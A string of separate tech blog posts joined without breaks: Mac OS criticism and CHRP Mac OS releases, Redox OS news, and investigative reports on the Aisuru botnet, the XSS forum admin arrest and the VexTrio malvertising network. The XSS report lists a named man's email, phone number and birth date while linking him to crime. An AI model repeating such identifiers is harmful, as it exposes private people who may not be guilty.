It’s always a bit sad and a little awkward when reality starts hitting long-time fans and users of an operating system, isn’t it? I feel like I’m at least fifteen years ahead of everyone else when it comes to macOS, at least.

Over the last few weeks I’ve been discovering problems that have been eroding confidence in macOS. From text files that simply won’t show up in Spotlight search, to Clock timers that are blank and don’t function, there’s one common feature: macOS encounters an error or fault, but doesn’t report that to the user, instead just burying it deep in the log.

When you can spare the time, the next step is to contact Apple Support, who seem equally puzzled. You’re eventually advised to reinstall macOS or, in the worst case, to wipe a fairly new Apple silicon Mac and restore it in DFU mode, but have no reason to believe that will stop the problem from recurring. You know that Apple Support doesn’t understand what’s going wrong, and despite the involvement of support engineers, they seem as perplexed as you.

↫ Howard Oakley

I remember when Mac OS X was so far ahead of the competition it was honestly a little tragic. Around the late PowerPC and very early Intel days, when the iPhone hadn’t yet had the impact on the company it has now, the Mac and its operating system were the star of the company’s show, and you felt it when you used it. Even though the late PowerPC hardware was being outpaced left, right, and centre by Intel and AMD hardware in virtually every sense, Mac OS X more than made up for it being being a carefully and lovingly crafted operating system designed and developed by people who clearly deeply cared.

I used nothing but Macs as a result.

These days, everything’s reversed. By all accounts, Macs are doing amazing hardware-wise, with efficient, powerful processors and solid design. The operating system, however, has become a complete and utter mess, showing us that no, merely having great hardware does not make up for shit software in the same way the reverse was true two decades ago. I’d rather use a slower, hotter laptop with great software than a faster, cooler laptop with terrible software.

I’m not sure we’re going to see this trend reversed any time soon. Apple, too, is chasing the dragon, and everything the company does is designed around their cash cow, and I just don’t see how that’s going to change without a complete overhaul of the company’s leadership.

Only a few weeks ago, the CHRP variants of Mac OS 7.6 and 8 were discovered and uploaded to the internet for posterity, but we’re already seeing the positive results of this event unfold: Mac OS 7.x can now run on the Mac Mini G4 – natively.

The very short of it is as follows. First, the CHRP release of Mac OS 8 contains a ROM file that allows Mac OS 8 to boot on the G4 Mac Mini. Second, the CHRP release of 7.6 contains a System Enabler that allows 7.6 earlier versions to run by using the aforementioned ROM file. Third, the ROM has been modified to add compatibility with as many Mac models as possible. There’s a lot more to it, of course, but the end result is that quite a few more older, pre-9.x versions of Mac OS can now run on G4 and G3 Macs, which is quite cool.

Of course, there are limitations.

Note that, although I describe many of these as “stable”, I mean you can use much of it normally (sound/video/networking aside) without it crashing or misbehaving, at least not too hard, but that is not to say everything works, because that is just not the case. For example, when present, avoid opening the Apple System Profiler, unless you want a massive crash as it struggles trying to profile and gather all the information about your system. Some other apps or Control Panels might either not work, or work up to a certain point, after which they might freeze, requiring you to Force Quit the Finder to keep on going. And so on.

↫ Jubadub at Mac OS 9 Lives

Issues or no, this is amazing news, and great work by all involved.

The next three in this series on online events highlighting interesting uses of AI in cybersecurity are online: #4, #5, and #6. Well worth watching.

The world’s largest and most disruptive botnet is now drawing a majority of its firepower from compromised Internet-of-Things (IoT) devices hosted on U.S. Internet providers like AT&T, Comcast and Verizon, new evidence suggests. Experts say the heavy concentration of infected devices at U.S. providers is complicating efforts to limit collateral damage from the botnet’s attacks, which shattered previous records this week with a brief traffic flood that clocked in at nearly 30 trillion bits of data per second.

Since its debut more than a year ago, the Aisuru botnet has steadily outcompeted virtually all other IoT-based botnets in the wild, with recent attacks siphoning Internet bandwidth from an estimated 300,000 compromised hosts worldwide.

The hacked systems that get subsumed into the botnet are mostly consumer-grade routers, security cameras, digital video recorders and other devices operating with insecure and outdated firmware, and/or factory-default settings. Aisuru’s owners are continuously scanning the Internet for these vulnerable devices and enslaving them for use in distributed denial-of-service (DDoS) attacks that can overwhelm targeted servers with crippling amounts of junk traffic.

As Aisuru’s size has mushroomed, so has its punch. In May 2025, KrebsOnSecurity was hit with a near-record 6.35 terabits per second (Tbps) attack from Aisuru, which was then the largest assault that Google’s DDoS protection service Project Shield had ever mitigated. Days later, Aisuru shattered that record with a data blast in excess of 11 Tbps.

By late September, Aisuru was publicly flexing DDoS capabilities topping 22 Tbps. Then on October 6, its operators heaved a whopping 29.6 terabits of junk data packets each second at a targeted host. Hardly anyone noticed because it appears to have been a brief test or demonstration of Aisuru’s capabilities: The traffic flood lasted less only a few seconds and was pointed at an Internet server that was specifically designed to measure large-scale DDoS attacks.

A measurement of an Oct. 6 DDoS believed to have been launched through multiple botnets operated by the owners of the Aisuru botnet. Image: DDoS Analyzer Community on Telegram.

Aisuru’s overlords aren’t just showing off. Their botnet is being blamed for a series of increasingly massive and disruptive attacks. Although recent assaults from Aisuru have targeted mostly ISPs that serve online gaming communities like Minecraft, those digital sieges often result in widespread collateral Internet disruption.

For the past several weeks, ISPs hosting some of the Internet’s top gaming destinations have been hit with a relentless volley of gargantuan attacks that experts say are well beyond the DDoS mitigation capabilities of most organizations connected to the Internet today.

Steven Ferguson is principal security engineer at Global Secure Layer (GSL), an ISP in Brisbane, Australia. GSL hosts TCPShield, which offers free or low-cost DDoS protection to more than 50,000 Minecraft servers worldwide. Ferguson told KrebsOnSecurity that on October 8, TCPShield was walloped with a blitz from Aisuru that flooded its network with more than 15 terabits of junk data per second.

Ferguson said that after the attack subsided, TCPShield was told by its upstream provider OVH that they were no longer welcome as a customer.

“This was causing serious congestion on their Miami external ports for several weeks, shown publicly via their weather map,” he said, explaining that TCPShield is now solely protected by GSL.

Traces from the recent spate of crippling Aisuru attacks on gaming servers can be still seen at the website blockgametracker.gg, which indexes the uptime and downtime of the top Minecraft hosts. In the following example from a series of data deluges on the evening of September 28, we can see an Aisuru botnet campaign briefly knocked TCPShield offline.

An Aisuru botnet attack on TCPShield (AS64199) on Sept. 28  can be seen in the giant downward spike in the middle of this uptime graphic. Image: grafana.blockgametracker.gg.

Paging through the same uptime graphs for other network operators listed shows almost all of them suffered brief but repeated outages around the same time. Here is the same uptime tracking for Minecraft servers on the network provider Cosmic (AS30456), and it shows multiple large dips that correspond to game server outages caused by Aisuru.

Multiple DDoS attacks from Aisuru can be seen against the Minecraft host Cosmic on Sept. 28. The sharp downward spikes correspond to brief but enormous attacks from Aisuru. Image: grafana.blockgametracker.gg.

BOTNETS R US

Ferguson said he’s been tracking Aisuru for about three months, and recently he noticed the botnet’s composition shifted heavily toward infected systems at ISPs in the United States. Ferguson shared logs from an attack on October 8 that indexed traffic by the total volume sent through each network provider, and the logs showed that 11 of the top 20 traffic sources were U.S. based ISPs.

AT&T customers were by far the biggest U.S. contributors to that attack, followed by botted systems on Charter Communications, Comcast, T-Mobile and Verizon, Ferguson found. He said the volume of data packets per second coming from infected IoT hosts on these ISPs is often so high that it has started to affect the quality of service that ISPs are able to provide to adjacent (non-botted) customers.

“The impact extends beyond victim networks,” Ferguson said. “For instance we have seen 500 gigabits of traffic via Comcast’s network alone. This amount of egress leaving their network, especially being so US-East concentrated, will result in congestion towards other services or content trying to be reached while an attack is ongoing.”

Roland Dobbins is principal engineer at Netscout. Dobbins said Ferguson is spot on, noting that while most ISPs have effective mitigations in place to handle large incoming DDoS attacks, many are far less prepared to manage the inevitable service degradation caused by large numbers of their customers suddenly using some or all available bandwidth to attack others.

“The outbound and cross-bound DDoS attacks can be just as disruptive as the inbound stuff,” Dobbin said. “We’re now in a situation where ISPs are routinely seeing terabit-per-second plus outbound attacks from their networks that can cause operational problems.”

“The crying need for effective and universal outbound DDoS attack suppression is something that is really being highlighted by these recent attacks,” Dobbins continued. “A lot of network operators are learning that lesson now, and there’s going to be a period ahead where there’s some scrambling and potential disruption going on.”

KrebsOnSecurity sought comment from the ISPs named in Ferguson’s report. Charter Communications pointed to a recent blog post on protecting its network, stating that Charter actively monitors for both inbound and outbound attacks, and that it takes proactive action wherever possible.

“In addition to our own extensive network security, we also aim to reduce the risk of customer connected devices contributing to attacks through our Advanced WiFi solution that includes Security Shield, and we make Security Suite available to our Internet customers,” Charter wrote in an emailed response to questions. “With the ever-growing number of devices connecting to networks, we encourage customers to purchase trusted devices with secure development and manufacturing practices, use anti-virus and security tools on their connected devices, and regularly download security patches.”

A spokesperson for Comcast responded, “Currently our network is not experiencing impacts and we are able to handle the traffic.”

9 YEARS OF MIRAI

Aisuru is built on the bones of malicious code that was leaked in 2016 by the original creators of the Mirai IoT botnet. Like Aisuru, Mirai quickly outcompeted all other DDoS botnets in its heyday, and obliterated previous DDoS attack records with a 620 gigabit-per-second siege that sidelined this website for nearly four days in 2016.

The Mirai botmasters likewise used their crime machine to attack mostly Minecraft servers, but with the goal of forcing Minecraft server owners to purchase a DDoS protection service that they controlled. In addition, they rented out slices of the Mirai botnet to paying customers, some of whom used it to mask the sources of other types of cybercrime, such as click fraud.

A depiction of the outages caused by the Mirai botnet attacks against the internet infrastructure firm Dyn on October 21, 2016. Source: Downdetector.com.

Dobbins said Aisuru’s owners also appear to be renting out their botnet as a distributed proxy network that cybercriminal customers anywhere in the world can use to anonymize their malicious traffic and make it appear to be coming from regular residential users in the U.S.

“The people who operate this botnet are also selling (it as) residential proxies,” he said. “And that’s being used to reflect application layer attacks through the proxies on the bots as well.”

The Aisuru botnet harkens back to its predecessor Mirai in another intriguing way. One of its owners is using the Telegram handle “9gigsofram,” which corresponds to the nickname used by the co-owner of a Minecraft server protection service called Proxypipe that was heavily targeted in 2016 by the original Mirai botmasters.

Robert Coelho co-ran Proxypipe back then along with his business partner Erik “9gigsofram” Buckingham, and has spent the past nine years fine-tuning various DDoS mitigation companies that cater to Minecraft server operators and other gaming enthusiasts. Coelho said he has no idea why one of Aisuru’s botmasters chose Buckingham’s nickname, but added that it might say something about how long this person has been involved in the DDoS-for-hire industry.

“The Aisuru attacks on the gaming networks these past seven day have been absolutely huge, and you can see tons of providers going down multiple times a day,” Coelho said.

Coelho said the 15 Tbps attack this week against TCPShield was likely only a portion of the total attack volume hurled by Aisuru at the time, because much of it would have been shoved through networks that simply couldn’t process that volume of traffic all at once. Such outsized attacks, he said, are becoming increasingly difficult and expensive to mitigate.

“It’s definitely at the point now where you need to be spending at least a million dollars a month just to have the network capacity to be able to deal with these attacks,” he said.

RAPID SPREAD

Aisuru has long been rumored to use multiple zero-day vulnerabilities in IoT devices to aid its rapid growth over the past year. XLab, the Chinese security company that was the first to profile Aisuru’s rise in 2024, warned last month that one of the Aisuru botmasters had compromised the firmware distribution website for Totolink, a maker of low-cost routers and other networking gear.

“Multiple sources indicate the group allegedly compromised a router firmware update server in April and distributed malicious scripts to expand the botnet,” XLab wrote on September 15. “The node count is currently reported to be around 300,000.”

A malicious script implanted into a Totolink update server in April 2025. Image: XLab.

Aisuru’s operators received an unexpected boost to their crime machine in August when the U.S. Department Justice charged the alleged proprietor of Rapper Bot, a DDoS-for-hire botnet that competed directly with Aisuru for control over the global pool of vulnerable IoT systems.

Once Rapper Bot was dismantled, Aisuru’s curators moved quickly to commandeer vulnerable IoT devices that were suddenly set adrift by the government’s takedown, Dobbins said.

“Folks were arrested and Rapper Bot control servers were seized and that’s great, but unfortunately the botnet’s attack assets were then pieced out by the remaining botnets,” he said. “The problem is, even if those infected IoT devices are rebooted and cleaned up, they will still get re-compromised by something else generally within minutes of being plugged back in.”

A screenshot shared by XLabs showing the Aisuru botmasters recently celebrating a record-breaking 7.7 Tbps DDoS. The user at the top has adopted the name “Ethan J. Foltz” in a mocking tribute to the alleged Rapper Bot operator who was arrested and charged in August 2025.

BOTMASTERS AT LARGE

XLab’s September blog post cited multiple unnamed sources saying Aisuru is operated by three cybercriminals: “Snow,” who’s responsible for botnet development; “Tom,” tasked with finding new vulnerabilities; and “Forky,” responsible for botnet sales.

KrebsOnSecurity interviewed Forky in our May 2025 story about the record 6.3 Tbps attack from Aisuru. That story identified Forky as a 21-year-old man from Sao Paulo, Brazil who has been extremely active in the DDoS-for-hire scene since at least 2022. The FBI has seized Forky’s DDoS-for-hire domains several times over the years.

Like the original Mirai botmasters, Forky also operates a DDoS mitigation service called Botshield. Forky declined to discuss the makeup of his ISP’s clientele, or to clarify whether Botshield was more of a hosting provider or a DDoS mitigation firm. However, Forky has posted on Telegram about Botshield successfully mitigating large DDoS attacks launched against other DDoS-for-hire services.

In our previous interview, Forky acknowledged being involved in the development and marketing of Aisuru, but denied participating in attacks launched by the botnet.

Reached for comment earlier this month, Forky continued to maintain his innocence, claiming that he also is still trying to figure out who the current Aisuru botnet operators are in real life (Forky said the same thing in our May interview).

But after a week of promising juicy details, Forky came up empty-handed once again. Suspecting that Forky was merely being coy, I asked him how someone so connected to the DDoS-for-hire world could still be mystified on this point, and suggested that his inability or unwillingness to blame anyone else for Aisuru would not exactly help his case.

At this, Forky verbally bristled at being pressed for more details, and abruptly terminated our interview.

“I’m not here to be threatened with ignorance because you are stressed,” Forky replied. “They’re blaming me for those new attacks. Pretty much the whole world (is) due to your blog.”

For those of us unaware – unlikely on OSNews, but still – for a hot minute in the second half of the ’90s, Apple licensed its Mac OS to OEMs, resulting in officially sanctioned Mac clones from a variety of companies. While intended to grow the Mac’s market share, what ended up happening instead is that the clone makers outcompeted Apple on performance, price, and features, with clones offering several features and capabilities before Apple did – for far lower prices. When Steve Jobs returned to Apple, he killed the clone program almost instantly.

The rather abrupt end of the clone program means there’s a number of variants of the Mac OS that never made their way into the market, most notable variants intended for the Common Reference Hardware Platform, or CHRP, a standard defined by IBM and Apple for PowerPC-based PCs. Thanks to the popular classic Mac YouTuber Mac84, we now have a few of these releases out in the wild.

These CDs contain release candidates for Mac OS 7.6 and Mac OS 8 for CHRP (Common Hardware Reference Platform) systems. They were created to support CHRP computers, but were never released, likely due to Steve Jobs returning to Apple in September 1997 and eliminating the Mac Clone program and any CHRP efforts.

↫ Mac OS 7.6/8 CHRP releases page

Mac84 has an accompanying video diving into more detail about these individual releases by booting and running them in an emulator, so we can get a better idea of what they contain.

While most clone makers only got access to Mac OS 7.x, some of them did, in fact, gain access to Mac OS 8, namely UMAX and Power Computing (the latter of which was acquired by Apple). It’s not the clone nature of these releases that make them special, but the fact they’re CHRP releases is. This reference platform was a failure in the market, and only a few of IBM’s own machines and some of Motorola’s PowerStack machines properly supported it. Apple, meanwhile, only aid minor lip service to CHRP in its New World Power Macintosch machines.

Redox keeps improving every month, and this past one is certainly a banger. The big news this past month is that Servo, the browser engine written in Rust, has been ported to Redox. It’s extremely spartan at the moment, and crashes when a second website is loaded, but it’s a promising start. It also just makes sense to have the premier Rust browser engine running on the premier Rust operating system. Htop and bottom have been ported to Redox for much improved system monitoring, and they’re joined by a port of GoAccess.

The version of Rust has been updated which fixed some issues, and keyboard layout configuration has been greatly improved. Instead of a few hardcoded layouts, they can now be configured dynamically for users of PS/2 keyboards, with USB keyboards receiving this functionality soon as well. There’s more, of course, as well as the usual slew of low-level changes and improvements to drivers, the kernel relibc, and more.

On the new MacOS 26 (Tahoe), Apple has mandated that all application icons fit into their prescribed squircle. No longer can icons have distinct shapes, nor even any fun frame-breaking accessories. Should an icon be so foolish as to try to have a bit of personality, it will find itself stuffed into a dingy gray icon jail.

↫ Paul Kafasis

The downgraded icons listed in this article are just… Sad. While there’s no accounting for tastes, Apple’s new glassy icons are just plain bad, void of any whimsy, and lacking in artistry. Considering where Apple came from back when it made beautifully crafted icons that set the bar for the entire industry.

Almost seems like a metaphor for tech in general.

On July 22, 2025, the European police agency Europol said a long-running investigation led by the French Police resulted in the arrest of a 38-year-old administrator of XSS, a Russian-language cybercrime forum with more than 50,000 members. The action has triggered an ongoing frenzy of speculation and panic among XSS denizens about the identity of the unnamed suspect, but the consensus is that he is a pivotal figure in the crime forum scene who goes by the hacker handle “Toha.” Here’s a deep dive on what’s knowable about Toha, and a short stab at who got nabbed.

An unnamed 38-year-old man was arrested in Kiev last month on suspicion of administering the cybercrime forum XSS. Image: ssu.gov.ua.

Europol did not name the accused, but published partially obscured photos of him from the raid on his residence in Kiev. The police agency said the suspect acted as a trusted third party — arbitrating disputes between criminals — and guaranteeing the security of transactions on XSS. A statement from Ukraine’s SBU security service said XSS counted among its members many cybercriminals from various ransomware groups, including REvil, LockBit, Conti, and Qiliin.

Since the Europol announcement, the XSS forum resurfaced at a new address on the deep web (reachable only via the anonymity network Tor). But from reviewing the recent posts, there appears to be little consensus among longtime members about the identity of the now-detained XSS administrator.

The most frequent comment regarding the arrest was a message of solidarity and support for Toha, the handle chosen by the longtime administrator of XSS and several other major Russian forums. Toha’s accounts on other forums have been silent since the raid.

Europol said the suspect has enjoyed a nearly 20-year career in cybercrime, which roughly lines up with Toha’s history. In 2005, Toha was a founding member of the Russian-speaking forum Hack-All. That is, until it got massively hacked a few months after its debut. In 2006, Toha rebranded the forum to exploit[.]in, which would go on to draw tens of thousands of members, including an eventual Who’s-Who of wanted cybercriminals.

Toha announced in 2018 that he was selling the Exploit forum, prompting rampant speculation on the forums that the buyer was secretly a Russian or Ukrainian government entity or front person. However, those suspicions were unsupported by evidence, and Toha vehemently denied the forum had been given over to authorities.

One of the oldest Russian-language cybercrime forums was DaMaGeLaB, which operated from 2004 to 2017, when its administrator “Ar3s” was arrested. In 2018, a partial backup of the DaMaGeLaB forum was reincarnated as xss[.]is, with Toha as its stated administrator.

CROSS-SITE GRIFTING

Clues about Toha’s early presence on the Internet — from ~2004 to 2010 — are available in the archives of Intel 471, a cyber intelligence firm that tracks forum activity. Intel 471 shows Toha used the same email address across multiple forum accounts, including at Exploit, Antichat, Carder[.]su and inattack[.]ru.

DomainTools.com finds Toha’s email address — toschka2003@yandex.ru — was used to register at least a dozen domain names — most of them from the mid- to late 2000s. Apart from exploit[.]in and a domain called ixyq[.]com, the other domains registered to that email address end in .ua, the top-level domain for Ukraine (e.g. deleted.org[.]ua, lj.com[.]ua, and blogspot.org[.]ua).

A 2008 snapshot of a domain registered to toschka2003@yandex.ru and to Anton Medvedovsky in Kiev. Note the message at the bottom left, “Protected by Exploit,in.” Image: archive.org.

Nearly all of the domains registered to toschka2003@yandex.ru contain the name Anton Medvedovskiy in the registration records, except for the aforementioned ixyq[.]com, which is registered to the name Yuriy Avdeev in Moscow.

This Avdeev surname came up in a lengthy conversation with Lockbitsupp, the leader of the rapacious and destructive ransomware affiliate group Lockbit. The conversation took place in February 2024, when Lockbitsupp asked for help identifying Toha’s real-life identity.

In early 2024, the leader of the Lockbit ransomware group — Lockbitsupp — asked for help investigating the identity of the XSS administrator Toha, which he claimed was a Russian man named Anton Avdeev.

Lockbitsupp didn’t share why he wanted Toha’s details, but he maintained that Toha’s real name was Anton Avdeev. I declined to help Lockbitsupp in whatever revenge he was planning on Toha, but his question made me curious to look deeper.

It appears Lockbitsupp’s query was based on a now-deleted Twitter post from 2022, when a user by the name “3xp0rt” asserted that Toha was a Russian man named Anton Viktorovich Avdeev, born October 27, 1983.

Searching the web for Toha’s email address toschka2003@yandex.ru reveals a 2010 sales thread on the forum bmwclub.ru where a user named Honeypo was selling a 2007 BMW X5. The ad listed the contact person as Anton Avdeev and gave the contact phone number 9588693.

A search on the phone number 9588693 in the breach tracking service Constella Intelligence finds plenty of official Russian government records with this number, date of birth and the name Anton Viktorovich Avdeev. For example, hacked Russian government records show this person has a Russian tax ID and SIN (Social Security number), and that they were flagged for traffic violations on several occasions by Moscow police; in 2004, 2006, 2009, and 2014.

Astute readers may have noticed by now that the ages of Mr. Avdeev (41) and the XSS admin arrested this month (38) are a bit off. This would seem to suggest that the person arrested is someone other than Mr. Avdeev, who did not respond to requests for comment.

A FLY ON THE WALL

For further insight on this question, KrebsOnSecurity sought comments from Sergeii Vovnenko, a former cybercriminal from Ukraine who now works at the security startup paranoidlab.com. I reached out to Vovnenko because for several years beginning around 2010 he was the owner and operator of thesecure[.]biz, an encrypted “Jabber” instant messaging server that Europol said was operated by the suspect arrested in Kiev. Thesecure[.]biz grew quite popular among many of the top Russian-speaking cybercriminals because it scrupulously kept few records of its users’ activity, and its administrator was always a trusted member of the community.

The reason I know this historic tidbit is that in 2013, Vovnenko — using the hacker nicknames “Fly,” and “Flycracker” — hatched a plan to have a gram of heroin purchased off of the Silk Road darknet market and shipped to our home in Northern Virginia. The scheme was to spoof a call from one of our neighbors to the local police, saying this guy Krebs down the street was a druggie who was having narcotics delivered to his home.

I happened to be lurking on Flycracker’s private cybercrime forum when his heroin-framing plan was carried out, and called the police myself before the smack eventually arrived in the U.S. Mail. Vovnenko was later arrested for unrelated cybercrime activities, extradited to the United States, convicted, and deported after a 16-month stay in the U.S. prison system [on several occasions, he has expressed heartfelt apologies for the incident, and we have since buried the hatchet].

Vovnenko said he purchased a device for cloning credit cards from Toha in 2009, and that Toha shipped the item from Russia. Vovnenko explained that he (Flycracker) was the owner and operator of thesecure[.]biz from 2010 until his arrest in 2014.

Vovnenko believes thesecure[.]biz was stolen while he was in jail, either by Toha and/or an XSS administrator who went by the nicknames N0klos and Sonic.

“When I was in jail, [the] admin of xss.is stole that domain, or probably N0klos bought XSS from Toha or vice versa,” Vovnenko said of the Jabber domain. “Nobody from [the forums] spoke with me after my jailtime, so I can only guess what really happened.”

N0klos was the owner and administrator of an early Russian-language cybercrime forum known as Darklife[.]ws. However, N0kl0s also appears to be a lifelong Russian resident, and in any case seems to have vanished from Russian cybercrime forums several years ago.

Asked whether he believes Toha was the XSS administrator who was arrested this month in Ukraine, Vovnenko maintained that Toha is Russian, and that “the French cops took the wrong guy.”

WHO IS TOHA?

So who did the Ukrainian police arrest in response to the investigation by the French authorities? It seems plausible that the BMW ad invoking Toha’s email address and the name and phone number of a Russian citizen was simply misdirection on Toha’s part — intended to confuse and throw off investigators. Perhaps this even explains the Avdeev surname surfacing in the registration records from one of Toha’s domains.

But sometimes the simplest answer is the correct one. “Toha” is a common Slavic nickname for someone with the first name “Anton,” and that matches the name in the registration records for more than a dozen domains tied to Toha’s toschka2003@yandex.ru email address: Anton Medvedovskiy.

Constella Intelligence finds there is an Anton Gannadievich Medvedovskiy living in Kiev who will be 38 years old in December. This individual owns the email address itsmail@i.ua, as well an an Airbnb account featuring a profile photo of a man with roughly the same hairline as the suspect in the blurred photos released by the Ukrainian police. Mr. Medvedovskiy did not respond to a request for comment.

My take on the takedown is that the Ukrainian authorities likely arrested Medvedovskiy. Toha shared on DaMaGeLab in 2005 that he had recently finished the 11th grade and was studying at a university — a time when Mevedovskiy would have been around 18 years old. On Dec. 11, 2006, fellow Exploit members wished Toha a happy birthday. Records exposed in a 2022 hack at the Ukrainian public services portal diia.gov.ua show that Mr. Medvedovskiy’s birthday is Dec. 11, 1987.

The law enforcement action and resulting confusion about the identity of the detained has thrown the Russian cybercrime forum scene into disarray in recent weeks, with lengthy and heated arguments about XSS’s future spooling out across the forums.

XSS relaunched on a new Tor address shortly after the authorities plastered their seizure notice on the forum’s  homepage, but all of the trusted moderators from the old forum were dismissed without explanation. Existing members saw their forum account balances drop to zero, and were asked to plunk down a deposit to register at the new forum. The new XSS “admin” said they were in contact with the previous owners and that the changes were to help rebuild security and trust within the community.

However, the new admin’s assurances appear to have done little to assuage the worst fears of the forum’s erstwhile members, most of whom seem to be keeping their distance from the relaunched site for now.

Indeed, if there is one common understanding amid all of these discussions about the seizure of XSS, it is that Ukrainian and French authorities now have several years worth of private messages between XSS forum users, as well as contact rosters and other user data linked to the seized Jabber server.

“The myth of the ‘trusted person’ is shattered,” the user “GordonBellford” cautioned on Aug. 3 in an Exploit forum thread about the XSS admin arrest. “The forum is run by strangers. They got everything. Two years of Jabber server logs. Full backup and forum database.”

GordonBellford continued:

And the scariest thing is: this data array is not just an archive. It is material for analysis that has ALREADY BEEN DONE . With the help of modern tools, they see everything:

Graphs of your contacts and activity.
Relationships between nicknames, emails, password hashes and Jabber ID.
Timestamps, IP addresses and digital fingerprints.
Your unique writing style, phraseology, punctuation, consistency of grammatical errors, and even typical typos that will link your accounts on different platforms.

They are not looking for a needle in a haystack. They simply sifted the haystack through the AI sieve and got ready-made dossiers.

Late last year, security researchers made a startling discovery: Kremlin-backed disinformation campaigns were bypassing moderation on social media platforms by leveraging the same malicious advertising technology that powers a sprawling ecosystem of online hucksters and website hackers. A new report on the fallout from that investigation finds this dark ad tech industry is far more resilient and incestuous than previously known.

Image: Infoblox.

In November 2024, researchers at the security firm Qurium published an investigation into “Doppelganger,” a disinformation network that promotes pro-Russian narratives and infiltrates Europe’s media landscape by pushing fake news through a network of cloned websites.

Doppelganger campaigns use specialized links that bounce the visitor’s browser through a long series of domains before the fake news content is served. Qurium found Doppelganger relies on a sophisticated “domain cloaking” service, a technology that allows websites to present different content to search engines compared to what regular visitors see. The use of cloaking services helps the disinformation sites remain online longer than they otherwise would, while ensuring that only the targeted audience gets to view the intended content.

Qurium discovered that Doppelganger’s cloaking service also promoted online dating sites, and shared much of the same infrastructure with VexTrio, which is thought to be the oldest malicious traffic distribution system (TDS) in existence. While TDSs are commonly used by legitimate advertising networks to manage traffic from disparate sources and to track who or what is behind each click, VexTrio’s TDS largely manages web traffic from victims of phishing, malware, and social engineering scams.

BREAKING BAD

Digging deeper, Qurium noticed Doppelganger’s cloaking service used an Internet provider in Switzerland as the first entry point in a chain of domain redirections. They also noticed the same infrastructure hosted a pair of co-branded affiliate marketing services that were driving traffic to sketchy adult dating sites: LosPollos[.]com and TacoLoco[.]co.

The LosPollos ad network incorporates many elements and references from the hit series “Breaking Bad,” mirroring the fictional “Los Pollos Hermanos” restaurant chain that served as a money laundering operation for a violent methamphetamine cartel.

The LosPollos advertising network invokes characters and themes from the hit show Breaking Bad. The logo for LosPollos (upper left) is the image of Gustavo Fring, the fictional chicken restaurant chain owner in the show.

Affiliates who sign up with LosPollos are given JavaScript-heavy “smartlinks” that drive traffic into the VexTrio TDS, which in turn distributes the traffic among a variety of advertising partners, including dating services, sweepstakes offers, bait-and-switch mobile apps, financial scams and malware download sites.

LosPollos affiliates typically stitch these smart links into WordPress websites that have been hacked via known vulnerabilities, and those affiliates will earn a small commission each time an Internet user referred by any of their hacked sites falls for one of these lures.

The Los Pollos advertising network promoting itself on LinkedIn.

According to Qurium, TacoLoco is a traffic monetization network that uses deceptive tactics to trick Internet users into enabling “push notifications,” a cross-platform browser standard that allows websites to show pop-up messages which appear outside of the browser. For example, on Microsoft Windows systems these notifications typically show up in the bottom right corner of the screen — just above the system clock.

In the case of VexTrio and TacoLoco, the notification approval requests themselves are deceptive — disguised as “CAPTCHA” challenges designed to distinguish automated bot traffic from real visitors. For years, VexTrio and its partners have successfully tricked countless users into enabling these site notifications, which are then used to continuously pepper the victim’s device with a variety of phony virus alerts and misleading pop-up messages.

Examples of VexTrio landing pages that lead users to accept push notifications on their device.

According to a December 2024 annual report from GoDaddy, nearly 40 percent of compromised websites in 2024 redirected visitors to VexTrio via LosPollos smartlinks.

ADSPRO AND TEKNOLOGY

On November 14, 2024, Qurium published research to support its findings that LosPollos and TacoLoco were services operated by Adspro Group, a company registered in the Czech Republic and Russia, and that Adspro runs its infrastructure at the Swiss hosting providers C41 and Teknology SA.

Qurium noted the LosPollos and TacoLoco sites state that their content is copyrighted by ByteCore AG and SkyForge Digital AG, both Swiss firms that are run by the owner of Teknology SA, Giulio Vitorrio Leonardo Cerutti. Further investigation revealed LosPollos and TacoLoco were apps developed by a company called Holacode, which lists Cerutti as its CEO.

The apps marketed by Holacode include numerous VPN services, as well as one called Spamshield that claims to stop unwanted push notifications. But in January, Infoblox said they tested the app on their own mobile devices, and found it hides the user’s notifications, and then after 24 hours stops hiding them and demands payment. Spamshield subsequently changed its developer name from Holacode to ApLabz, although Infoblox noted that the Terms of Service for several of the rebranded ApLabz apps still referenced Holacode in their terms of service.

Incredibly, Cerutti threatened to sue me for defamation before I’d even uttered his name or sent him a request for comment (Cerutti sent the unsolicited legal threat back in January after his company and my name were merely tagged in an Infoblox post on LinkedIn about VexTrio).

Asked to comment on the findings by Qurium and Infoblox, Cerutti vehemently denied being associated with VexTrio. Cerutti asserted that his companies all strictly adhere to the regulations of the countries in which they operate, and that they have been completely transparent about all of their operations.

“We are a group operating in the advertising and marketing space, with an affiliate network program,” Cerutti responded. “I am not [going] to say we are perfect, but I strongly declare we have no connection with VexTrio at all.”

“Unfortunately, as a big player in this space we also get to deal with plenty of publisher fraud, sketchy traffic, fake clicks, bots, hacked, listed and resold publisher accounts, etc, etc.,” Cerutti continued. “We bleed lots of money to such malpractices and conduct regular internal screenings and audits in a constant battle to remove bad traffic sources. It is also a highly competitive space, where some upstarts will often play dirty against more established mainstream players like us.”

Working with Qurium, researchers at the security firm Infoblox released details about VexTrio’s infrastructure to their industry partners. Just four days after Qurium published its findings, LosPollos announced it was suspending its push monetization service. Less than a month later, Adspro had rebranded to Aimed Global.

A mind map illustrating some of the key findings and connections in the Infoblox and Qurium investigations. Click to enlarge.

A REVEALING PIVOT

In March 2025, researchers at GoDaddy chronicled how DollyWay — a malware strain that has consistently redirected victims to VexTrio throughout its eight years of activity — suddenly stopped doing that on November 20, 2024. Virtually overnight, DollyWay and several other malware families that had previously used VexTrio began pushing their traffic through another TDS called Help TDS.

Digging further into historical DNS records and the unique code scripts used by the Help TDS, Infoblox determined it has long enjoyed an exclusive relationship with VexTrio (at least until LosPollos ended its push monetization service in November).

In a report released today, Infoblox said an exhaustive analysis of the JavaScript code, website lures, smartlinks and DNS patterns used by VexTrio and Help TDS linked them with at least four other TDS operators (not counting TacoLoco). Those four entities — Partners House, BroPush, RichAds and RexPush — are all Russia-based push monetization programs that pay affiliates to drive signups for a variety of schemes, but mostly online dating services.

“As Los Pollos push monetization ended, we’ve seen an increase in fake CAPTCHAs that drive user acceptance of push notifications, particularly from Partners House,” the Infoblox report reads. “The relationship of these commercial entities remains a mystery; while they are certainly long-time partners redirecting traffic to one another, and they all have a Russian nexus, there is no overt common ownership.”

Renee Burton, vice president of threat intelligence at Infoblox, said the security industry generally treats the deceptive methods used by VexTrio and other malicious TDSs as a kind of legally grey area that is mostly associated with less dangerous security threats, such as adware and scareware.

